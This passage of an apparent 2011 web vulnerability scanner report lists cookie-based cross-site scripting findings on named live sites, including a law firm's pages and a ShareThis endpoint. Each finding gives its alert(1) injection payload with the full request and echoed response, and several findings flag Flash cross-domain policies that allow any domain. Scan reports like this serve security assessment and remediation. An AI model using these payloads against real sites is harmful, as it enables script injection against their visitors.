The value of the hubspotutk cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85c0c'-alert(1)-'c5c2da684e4 was submitted in the hubspotutk cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /salog.js.aspx HTTP/1.1
Host: pillsburylaw.app4.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: .ASPXANONYMOUS=StsAonAvzQEkAAAAYjYwNjBlNjMtYTcyMi00NzE0LWI1NjQtNDMyYWNlNmQ3NDBj0; hubspotutk=148ff71c-54bf-42a7-b313-024966931ee585c0c'-alert(1)-'c5c2da684e4; hsfirstvisit=http%253A%252F%252Fwww.pillsburylaw.com%252F%7chttp%253A%252F%252Fwww.google.com%252Fsearch%253Fq%253DPillsbury%252BWinthrop%252BShaw%252BPittman%2526ie%253Dutf-8%2526oe%253Dutf-8%2526aq%253Dt%2526rls%253Dorg.mozilla%253Aen-US%253Aofficial%2526client%253Dfirefox-a%7c2011-05-12%252008%253A21%253A46; HUBSPOT95=521213100.0.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Thu, 12 May 2011 17:01:49 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 824


var hsUse20Servers = true;
var hsDayEndsIn = 39490;
var hsWeekEndsIn = 298690;
var hsMonthEndsIn = 1681090;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-12 13:01
...[SNIP]...
6ie%253Dutf-8%2526oe%253Dutf-8%2526aq%253Dt%2526rls%253Dorg.mozilla%253Aen-US%253Aofficial%2526client%253Dfirefox-a%7c2011-05-12%252008%253A21%253A46";
var hsut = '148ff71c-54bf-42a7-b313-024966931ee585c0c'-alert(1)-'c5c2da684e4';
var hsVisitLogOff = true;


document.write(unescape("%3Cscript src='" + document.location.protocol + "//" + hs_ppa + "/salog20.js?v=2.12' type='text/javascript'%3E%3C/script%3E"));
5.107. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 61c71<script>alert(1)</script>e7f88610659 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.superlawyers.com%2Fpennsylvania%2Flawyer%2FGlenn-A-Ellis%2F8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&jsref=http%3A%2F%2Flayserfreiwald.com%2Fattorneys.html%3Fmode%3Dview%26AID%3D8&rnd=1305225348465 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==61c71<script>alert(1)</script>e7f88610659

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 12 May 2011 18:35:49 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==61c71<script>alert(1)</script>e7f88610659
userid:
</div>
...[SNIP]...
5.108. http://www.pillsburylaw.com/ [PCUSERNAME cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The value of the PCUSERNAME cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df1c2"><img%20src%3da%20onerror%3dalert(1)>abc907e40dd was submitted in the PCUSERNAME cookie. This input was echoed as df1c2"><img src=a onerror=alert(1)>abc907e40dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/6
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=df1c2"><img%20src%3da%20onerror%3dalert(1)>abc907e40dd; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 19:51:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<input type="text" name="pcusername" id="pcusername" value="df1c2"><img src=a onerror=alert(1)>abc907e40dd" onblur="if(this.value.length == 0){this.value='Email Address'};" onfocus="if(this.value=='Email Address'){this.value=''};" class="required email" alias="Username" style="width:94%;">
...[SNIP]...
5.109. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The value of the PCUSERNAME cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99487"><img%20src%3da%20onerror%3dalert(1)>d0f065db8fa was submitted in the PCUSERNAME cookie. This input was echoed as 99487"><img src=a onerror=alert(1)>d0f065db8fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=99487"><img%20src%3da%20onerror%3dalert(1)>d0f065db8fa; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 16:46:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<input type="text" name="pcusername" id="pcusername" value="99487"><img src=a onerror=alert(1)>d0f065db8fa" onblur="if(this.value.length == 0){this.value='Email Address'};" onfocus="if(this.value=='Email Address'){this.value=''};" class="required email" alias="Username" style="width:94%;">
...[SNIP]...
6. Flash cross-domain policy  previous  next
There are 34 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 19:53:40 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
6.2. http://attorney.findlaw.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://attorney.findlaw.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: attorney.findlaw.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:27 GMT
Server: Omniture DC/2.0.0
xserver: www324
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
6.3. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 18:35:49 GMT
Date: Thu, 12 May 2011 18:35:49 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
6.4. http://capgroup.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://capgroup.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: capgroup.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:44:41 GMT
Server: Omniture DC/2.0.0
xserver: www420
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
6.5. http://cspix.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cspix.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Thu, 12 May 2011 16:11:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
6.6. http://d1.openx.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:44:43 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "80468-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
6.7. http://ehg-findlaw.hitbox.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ehg-findlaw.hitbox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ehg-findlaw.hitbox.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:38 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Thu, 12 May 2011 17:09:38 GMT
Content-Type: text/xml
Content-Length: 93

<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>
6.8. http://ox-d.gartner.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ox-d.gartner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ox-d.gartner.com

Response

HTTP/1.0 200 OK
Server: MochiWeb/1.1 WebMachine/1.7.2 (participate in the frantic)
Date: Thu, 12 May 2011 20:21:46 GMT
Content-Type: application/xml
Content-Length: 205
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...
6.9. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1298012417000"
Last-Modified: Fri, 18 Feb 2011 07:00:17 GMT
Content-Type: application/xml
Content-Length: 211
Date: Thu, 12 May 2011 16:11:57 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...
6.10. http://u.openx.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://u.openx.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: u.openx.net

Response

HTTP/1.0 200 OK
Server: MochiWeb/1.1 WebMachine/1.7.2 (participate in the frantic)
Date: Thu, 12 May 2011 20:21:49 GMT
Content-Type: application/xml
Content-Length: 205
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...
6.11. http://www.bloomberg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bloomberg.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Expires: Fri, 11 May 2012 16:55:02 GMT
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Wed, 07 Jul 2010 19:36:53 GMT
ETag: W/"ff-4c34d755"
Date: Thu, 12 May 2011 16:55:02 GMT
Content-Length: 255
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-header
...[SNIP]...
6.12. http://www.nldhlaw.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nldhlaw.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nldhlaw.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Last-Modified: Mon, 02 Jun 2008 16:54:44 GMT
Accept-Ranges: bytes
ETag: "0a25b5bd1c4c81:a29e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Thu, 12 May 2011 16:09:07 GMT
Connection: close
Set-Cookie: BIGipServerFIRMSND07-80=272686346.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
6.13. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Thu, 12 May 2011 17:17:48 GMT
Date: Thu, 12 May 2011 17:15:48 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...
6.14. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 10:43:52 GMT
Expires: Fri, 13 May 2011 10:43:52 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 33019

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
6.15. http://imagesrv.gartner.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imagesrv.gartner.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: imagesrv.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 11 Jan 2010 19:57:11 GMT
Content-Type: text/xml
Date: Thu, 12 May 2011 20:18:56 GMT
Content-Length: 250
ETag: "pv0d9b8a99c33cd94acab66b5480d8601a"
